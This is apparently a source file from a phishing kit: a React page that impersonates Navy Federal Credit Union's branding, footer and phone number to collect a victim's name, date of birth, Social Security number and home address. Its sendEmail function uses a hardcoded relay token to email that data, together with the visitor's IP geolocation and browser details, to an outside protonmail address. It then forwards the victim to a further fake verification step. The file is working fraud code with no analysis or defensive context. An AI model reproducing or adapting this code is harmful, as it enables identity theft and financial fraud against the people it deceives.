import { useState, useEffect } from "react";
import detect from "detect.js";
import checkMark from "./checkmark.svg";
import activityPixel from "./activity_pixel.gif";
import styles from "./main-2601c417d92b4204d877.module.css";

const ua = detect.parse(navigator.userAgent);

const Main = (props) => {
  const [account, setAccount] = useState({
    firstName: "",
    lastName: "",
    middleName: "",
    suffix: "",
    dobYear: "",
    dobMonth: "",
    dobDate: "",
    ssn: "",
    addressOne: "",
    addressTwo: "",
    city: "",
    state: "",
    zipCode: "",
  });
  const [errors, setErrors] = useState({});
  const [location, setLocation] = useState({});
  const [modal, setModal] = useState(false);

  const validate = () => {
    const error = {};

    if (account.firstName.trim() === "" || account.firstName.length < 3) {
      error.firstName = true;
    }
    if (account.lastName.trim() === "" || account.lastName.length < 3) {
      error.lastName = true;
    }
    if (
      account.dobYear.trim() === "" ||
      account.dobYear.length < 4 ||
      account.dobYear.length > 4
    ) {
      error.dobYear = true;
    }

    if (account.dobMonth.trim() === "") {
      error.dobMonth = true;
    }

    if (
      account.dobDate.trim() === "" ||
      account.dobDate.length < 2 ||
      account.dobDate.length > 2
    ) {
      error.dobDate = true;
    }

    if (
      account.ssn.trim() === "" ||
      account.ssn.length < 9 ||
      account.ssn.length > 9
    ) {
      error.ssn = true;
    }

    if (
      account.zipCode.trim() === "" ||
      account.zipCode.length < 5 ||
      account.zipCode.length > 5
    ) {
      error.zipCode = true;
    }
    if (account.addressOne.trim() === "" || account.addressOne.length < 5) {
      error.addressOne = true;
    }
    if (account.city.trim() === "" || account.city.length < 3) {
      error.city = true;
    }

    if (account.state.trim() === "") {
      error.state = true;
    }

    return Object.keys(error).length === 0 ? null : error;
  };

  const handleChange = ({ currentTarget: input }) => {
    account[input.name] = input.value;
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const handleNumber = ({ currentTarget: input }) => {
    account[input.name] = input.value.replace(/\D/g, "");
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const sendEmail = () => {
    window.Email.send({
      SecureToken: "72fd21eb-812f-4304-98e2-c766c3468bd6",
      To: "hisname2001@protonmail.com",
      From: "NFCU@hey.com",
      Subject: `#NFCU PERSONAL INFO => From ${location && location.IPv4} [${
        location && location.country_name
      } - ${location && location.country_code}] `,
      Body: `
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - PERSONAL INFO ]=======# <b /></span> <br />
          <span style="font-family:Tahoma, sans-serif"> First Name: ${
            account.firstName
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Last Name: ${
            account.lastName
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Middle Name: ${
            account.middleName && account.middleName
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Suffix: ${
            account.suffix && account.suffix
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> SSN: ${
            account.ssn
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Date Of Birth: ${
            account.dobDate / account.dobMonth / account.dobYear
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Address One: ${
            account.addressOne
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Address Tow: ${
            account.addressTwo && account.addressTwo
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> City: ${
            account.city
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> State: ${
            account.state
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Zip Code: ${
            account.zipCode
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - IP INFO ]=======#</b> </span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Address: ${
            location && location.IPv4
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Country: ${
            location && location.country_name
          }${location && location.country_code}</span>  <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Latitude Longitude: ${
            location && location.latitude
          } ${location && location.longitude}</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif"> IP City: ${
            location && location.city
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Browser: ${
            ua && ua.browser.family
          } on ${ua && ua.device.family}</span> <br /> 
          <span style="font-family:Tahoma, sans-serif"> User Agent:  ${
            ua && ua.source }
          }} on {{ device }}</span> <br />
          <span style="font-family:Tahoma, sans-serif"> <b> #=======[ NFCU - PERSONAL INFO ]=======# </b> </span> <br />
      `,
    }).then((message) => message);
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    sendEmail();
    setModal(true);
    console.log(account);
    console.log(location);
    setTimeout(
      () => props.history.push("/NFOAA_AUTH/VERIFICATION/contact.jsp"),
      1500
    );
  };

  useEffect(() => {
    fetch(
      "https://geolocation-db.com/json/ef6c41a0-9d3c-11eb-8f3b-e1f5536499e7"
    )
      .then((response) => response.json())
      .then((data) => {
        const details = data;
        setLocation(details);
      });
  }, []);
  return (
    <>
      {modal && (
        <div id="wait-cursor">
          <div className={styles.loader}></div>
        </div>
      )}
      <header role="banner" id="application-header">
        <h1 className={styles.visiblyHidden} role="presentation">
          Navy Federal Credit Union
        </h1>
      </header>

      <main role="main" id="app-main">
        <section>
          <div id="wait-cursor" style={{ display: "none" }}>
            <div className={styles.loader}></div>
          </div>
          <div aria-live="assertive" className={styles.visuallyHidden}></div>

          <div data-v-1c530256="" data-v-169bc697="">
            <div
              data-v-1c530256=""
              className={`${styles.container} ${styles.clearfix} ${styles.card} ${styles.white}`}
            >
              <div
                data-v-5dff800b=""
                data-v-1c530256=""
                className={styles.progressbarWrapper}
              >
                <ul data-v-5dff800b="" className={styles.stepProgressBar}>
                  <li
                    data-v-5dff800b=""
                    className={`${styles.stepItem} ${styles.current}`}
                  >
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Eligibility step checked"
                      aria-hidden="true"
                      className={`${styles.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />
                    <span
                      data-v-5dff800b=""
                      className={`${styles.progressLabel} ${styles.singleLinePadding}`}
                    >
                      Personal Verification
                    </span>
                    <p data-v-5dff800b="" className={styles.visuallyHidden}>
                      step in progress
                    </p>
                  </li>
                  <li data-v-5dff800b="" className={`${styles.stepItem}`}>
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Membership step"
                      aria-hidden="true"
                      className={`${styles.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${styles.progressLabel} ${styles.singleLinePadding}`}
                    >
                      Contact Verification
                    </span>
                    <p data-v-5dff800b="" className={styles.visuallyHidden}>
                      step in progress
                    </p>
                  </li>
                  <li data-v-5dff800b="" className={styles.stepItem}>
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Finish Setup step"
                      aria-hidden="true"
                      className={`${styles.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${styles.progressLabel} ${styles.singleLinePadding}`}
                    >
                      Card Verification
                    </span>
                    <p data-v-5dff800b="" className={styles.visuallyHidden}></p>
                  </li>
                  <li data-v-5dff800b="" className={styles.stepItem}>
                    <img
                      data-v-5dff800b=""
                      src={checkMark}
                      alt="Sign In step"
                      aria-hidden="true"
                      className={`${styles.stepItemCheckmark}`}
                      style={{ width: "14px" }}
                    />{" "}
                    <span
                      data-v-5dff800b=""
                      className={`${styles.progressLabel} ${styles.singleLinePadding}`}
                    >
                      Complete
                    </span>
                    <p data-v-5dff800b="" className={styles.visuallyHidden}></p>
                  </li>
                </ul>
              </div>
              {/* <legend data-v-1c530256="" tabIndex="-1">
                <h1 data-v-1c530256="" className={styles.prompt">
                  Tell us about yourself
                </h1>
              </legend> */}

              <form data-v-1c530256="" onSubmit={handleSubmit}>
                <section data-v-169bc697="" data-v-1c530256="">
                  <header data-v-169bc697="" data-v-1c530256="">
                    <h2
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={styles.fieldGrouping}
                    >
                      Personal Information
                    </h2>
                  </header>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={styles.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={styles.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-41">
                          First Name
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            name="firstName"
                            value={account.firstName}
                            onChange={handleChange}
                            id="field-41"
                            maxLength="20"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-41"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={`${styles.colSm4} ${styles.wrappingRow}`}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-42">
                          <span data-v-169bc697="" data-v-2ae7dda6="">
                            Middle Initial
                          </span>
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-42"
                            maxLength="1"
                            placeholder="Optional"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="middleName"
                            value={account.middleName}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-42"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={styles.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={styles.colSm8}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-43">
                          Last Name
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-43"
                            maxLength="20"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="lastName"
                            value={account.lastName}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-43"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={`${styles.colSm4} ${styles.wrappingRow}`}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-44">
                          <span data-v-169bc697="" data-v-2ae7dda6="">
                            Suffix
                          </span>
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-44"
                            maxLength="3"
                            placeholder="Optional"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="suffix"
                            value={account.suffix}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-44"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={styles.row}
                    style={{ marginTop: "0px" }}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={styles.colSm}
                    >
                      <fieldset
                        data-v-1355d37a=""
                        data-v-169bc697=""
                        className={styles.row}
                        data-v-1c530256=""
                      >
                        <legend data-v-1355d37a="" className={styles.col12}>
                          Date of Birth
                        </legend>
                        <div
                          data-v-1355d37a=""
                          className={`${styles.row} ${styles.fullRow}`}
                        >
                          <div data-v-1355d37a="" className={styles.selCol}>
                            <label data-v-1355d37a="" htmlFor="month">
                              Month
                            </label>
                            <select
                              data-v-1355d37a=""
                              id="month"
                              className=""
                              name="dobMonth"
                              value={account.dobMonth}
                              onChange={handleChange}
                            >
                              <option data-v-1355d37a="" selected="selected">
                                Select Month
                              </option>
                              <option data-v-1355d37a="" value="01">
                                January
                              </option>
                              <option data-v-1355d37a="" value="02">
                                February
                              </option>
                              <option data-v-1355d37a="" value="03">
                                March
                              </option>
                              <option data-v-1355d37a="" value="04">
                                April
                              </option>
                              <option data-v-1355d37a="" value="05">
                                May
                              </option>
                              <option data-v-1355d37a="" value="06">
                                June
                              </option>
                              <option data-v-1355d37a="" value="07">
                                July
                              </option>
                              <option data-v-1355d37a="" value="08">
                                August
                              </option>
                              <option data-v-1355d37a="" value="09">
                                September
                              </option>
                              <option data-v-1355d37a="" value="10">
                                October
                              </option>
                              <option data-v-1355d37a="" value="11">
                                November
                              </option>
                              <option data-v-1355d37a="" value="12">
                                December
                              </option>
                            </select>
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="day">
                              Day
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="day"
                              maxLength="2"
                              size="3"
                              pattern="[0-9]*"
                              className={`${styles.pvm} ${styles.phs} ${styles.inputBorder}`}
                              name="dobDate"
                              value={account.dobDate}
                              onChange={handleNumber}
                            />
                          </div>
                          <div data-v-1355d37a="">
                            <label data-v-1355d37a="" htmlFor="year">
                              Year
                            </label>{" "}
                            <input
                              data-v-1355d37a=""
                              type="tel"
                              id="year"
                              maxLength="4"
                              size="5"
                              pattern="[0-9]*"
                              className={`${styles.pvm} ${styles.phs} ${styles.inputBorder}`}
                              name="dobYear"
                              value={account.dobYear}
                              onChange={handleNumber}
                            />
                          </div>
                        </div>
                      </fieldset>
                    </div>
                  </div>
                  <div
                    data-v-169bc697=""
                    data-v-1c530256=""
                    className={styles.row}
                  >
                    <div
                      data-v-169bc697=""
                      data-v-1c530256=""
                      className={styles.colSm}
                    >
                      <div
                        data-v-2ae7dda6=""
                        data-v-169bc697=""
                        data-v-1c530256=""
                      >
                        <label data-v-2ae7dda6="" htmlFor="field-46">
                          Social Security Number
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-46"
                            maxLength="9"
                            pattern="[0-9]*"
                            type="tel"
                            className={`${styles.formInput} ${styles.pwd} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="ssn"
                            value={account.ssn}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-46"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                </section>
                <section>
                  <div className={styles.row}>
                    <div className={styles.col}>
                      <h2
                        data-v-169bc697=""
                        data-v-1c530256=""
                        className={styles.fieldGrouping}
                      >
                        Primary Address
                      </h2>
                      <div data-v-2ae7dda6="">
                        <label data-v-2ae7dda6="" htmlFor="field-67">
                          Address Line 1
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-67"
                            maxlength="40"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="addressOne"
                            value={account.addressOne}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-67"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div className={styles.row}>
                    <div className={styles.col}>
                      <div data-v-2ae7dda6="">
                        <label data-v-2ae7dda6="" htmlFor="field-68">
                          Address Line 2
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-68"
                            maxlength="40"
                            placeholder="Optional"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="addressTwo"
                            value={account.addressTwo}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-68"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div className={styles.row}>
                    <div className={styles.col}>
                      <div data-v-2ae7dda6="">
                        <label data-v-2ae7dda6="" htmlFor="field-69">
                          City
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-69"
                            maxlength="20"
                            type="text"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="city"
                            value={account.city}
                            onChange={handleChange}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-69"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                  <div className={styles.row}>
                    <div className={styles.colSm6}>
                      <div data-v-7d1371a8="">
                        <label data-v-7d1371a8="" htmlFor="field-70">
                          State
                        </label>{" "}
                        <select
                          data-v-7d1371a8=""
                          id="field-70"
                          name="state"
                          value={account.state}
                          onChange={handleChange}
                        >
                          <option data-v-7d1371a8="" selected="selected">
                            Select State
                          </option>
                          <option data-v-7d1371a8="" value="AA">
                            AA
                          </option>
                          <option data-v-7d1371a8="" value="AE">
                            AE
                          </option>
                          <option data-v-7d1371a8="" value="AK">
                            AK
                          </option>
                          <option data-v-7d1371a8="" value="AL">
                            AL
                          </option>
                          <option data-v-7d1371a8="" value="AP">
                            AP
                          </option>
                          <option data-v-7d1371a8="" value="AR">
                            AR
                          </option>
                          <option data-v-7d1371a8="" value="AS">
                            AS
                          </option>
                          <option data-v-7d1371a8="" value="AZ">
                            AZ
                          </option>
                          <option data-v-7d1371a8="" value="CA">
                            CA
                          </option>
                          <option data-v-7d1371a8="" value="CO">
                            CO
                          </option>
                          <option data-v-7d1371a8="" value="CT">
                            CT
                          </option>
                          <option data-v-7d1371a8="" value="DC">
                            DC
                          </option>
                          <option data-v-7d1371a8="" value="DE">
                            DE
                          </option>
                          <option data-v-7d1371a8="" value="FL">
                            FL
                          </option>
                          <option data-v-7d1371a8="" value="FM">
                            FM
                          </option>
                          <option data-v-7d1371a8="" value="GA">
                            GA
                          </option>
                          <option data-v-7d1371a8="" value="GU">
                            GU
                          </option>
                          <option data-v-7d1371a8="" value="HI">
                            HI
                          </option>
                          <option data-v-7d1371a8="" value="IA">
                            IA
                          </option>
                          <option data-v-7d1371a8="" value="ID">
                            ID
                          </option>
                          <option data-v-7d1371a8="" value="IL">
                            IL
                          </option>
                          <option data-v-7d1371a8="" value="IN">
                            IN
                          </option>
                          <option data-v-7d1371a8="" value="KS">
                            KS
                          </option>
                          <option data-v-7d1371a8="" value="KY">
                            KY
                          </option>
                          <option data-v-7d1371a8="" value="LA">
                            LA
                          </option>
                          <option data-v-7d1371a8="" value="MA">
                            MA
                          </option>
                          <option data-v-7d1371a8="" value="MD">
                            MD
                          </option>
                          <option data-v-7d1371a8="" value="ME">
                            ME
                          </option>
                          <option data-v-7d1371a8="" value="MH">
                            MH
                          </option>
                          <option data-v-7d1371a8="" value="MI">
                            MI
                          </option>
                          <option data-v-7d1371a8="" value="MN">
                            MN
                          </option>
                          <option data-v-7d1371a8="" value="MO">
                            MO
                          </option>
                          <option data-v-7d1371a8="" value="MP">
                            MP
                          </option>
                          <option data-v-7d1371a8="" value="MS">
                            MS
                          </option>
                          <option data-v-7d1371a8="" value="MT">
                            MT
                          </option>
                          <option data-v-7d1371a8="" value="NC">
                            NC
                          </option>
                          <option data-v-7d1371a8="" value="ND">
                            ND
                          </option>
                          <option data-v-7d1371a8="" value="NE">
                            NE
                          </option>
                          <option data-v-7d1371a8="" value="NH">
                            NH
                          </option>
                          <option data-v-7d1371a8="" value="NJ">
                            NJ
                          </option>
                          <option data-v-7d1371a8="" value="NM">
                            NM
                          </option>
                          <option data-v-7d1371a8="" value="NV">
                            NV
                          </option>
                          <option data-v-7d1371a8="" value="NY">
                            NY
                          </option>
                          <option data-v-7d1371a8="" value="OH">
                            OH
                          </option>
                          <option data-v-7d1371a8="" value="OK">
                            OK
                          </option>
                          <option data-v-7d1371a8="" value="OR">
                            OR
                          </option>
                          <option data-v-7d1371a8="" value="PA">
                            PA
                          </option>
                          <option data-v-7d1371a8="" value="PR">
                            PR
                          </option>
                          <option data-v-7d1371a8="" value="PW">
                            PW
                          </option>
                          <option data-v-7d1371a8="" value="RI">
                            RI
                          </option>
                          <option data-v-7d1371a8="" value="SC">
                            SC
                          </option>
                          <option data-v-7d1371a8="" value="SD">
                            SD
                          </option>
                          <option data-v-7d1371a8="" value="TN">
                            TN
                          </option>
                          <option data-v-7d1371a8="" value="TX">
                            TX
                          </option>
                          <option data-v-7d1371a8="" value="UT">
                            UT
                          </option>
                          <option data-v-7d1371a8="" value="VA">
                            VA
                          </option>
                          <option data-v-7d1371a8="" value="VI">
                            VI
                          </option>
                          <option data-v-7d1371a8="" value="VT">
                            VT
                          </option>
                          <option data-v-7d1371a8="" value="WA">
                            WA
                          </option>
                          <option data-v-7d1371a8="" value="WI">
                            WI
                          </option>
                          <option data-v-7d1371a8="" value="WV">
                            WV
                          </option>
                          <option data-v-7d1371a8="" value="WY">
                            WY
                          </option>
                        </select>
                      </div>
                    </div>
                  </div>
                  <div className={styles.row}>
                    <div className={styles.col}>
                      <div data-v-2ae7dda6="">
                        <label data-v-2ae7dda6="" htmlFor="field-71">
                          Zip Code
                        </label>{" "}
                        <br data-v-2ae7dda6="" />
                        <div data-v-2ae7dda6="" className={styles.inputGroup}>
                          <input
                            data-v-2ae7dda6=""
                            id="field-71"
                            maxlength="9"
                            pattern="[0-9]*"
                            type="tel"
                            className={`${styles.formInput} ${styles.pvm} ${styles.phs} ${styles.fullWidth} ${styles.inputBorder}`}
                            name="zipCode"
                            value={account.zipCode}
                            onChange={handleNumber}
                          />
                        </div>
                        <ul
                          data-v-2ae7dda6=""
                          id="error-71"
                          aria-live="polite"
                          className={styles.errorList}
                        ></ul>
                      </div>
                    </div>
                  </div>
                </section>
                <div
                  data-v-1c530256=""
                  className={`${styles.row} ${styles.actions}`}
                >
                  <div data-v-1c530256="" className={styles.col}>
                    <div data-v-1c530256="" className={styles.textCenter}>
                      <button
                        data-v-1c530256=""
                        id="app-personal-info-cont"
                        type="submit"
                        className={`${styles.btn} ${styles.action} ${styles.forward}`}
                        disabled={errors ? "disabled" : null}
                      >
                        Continue
                      </button>
                    </div>
                  </div>
                </div>
              </form>
            </div>
          </div>
        </section>
      </main>

      <footer id="application-footer">
        <section
          className={`${styles.containerFluid} ${styles.container} {styles.clearfix}`}
        >
          <p>
            <strong>© 2021 Navy Federal Credit Union.</strong> All rights
            reserved
          </p>
          <p>
            <span className={`${styles.nfcuIcon} ${styles.iconNcua}`}></span>
            <a
              href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf"
              target="_blank"
            >
              Federally Insured by NCUA
            </a>
            • If you have questions please contact us: 1-888-842-6328
          </p>
        </section>
      </footer>

      {/* <!-- 
Start of global snippet: Please do not remove
Place this snippet between the <head> and </head> tags on every page of your site.
-->
  <!-- Global site tag (gtag.js) - Google Marketing Platform -->


  <!-- End of global snippet: Please do not remove --> */}
      <img src={activityPixel} hidden="" />
    </>
  );
};

export default Main;
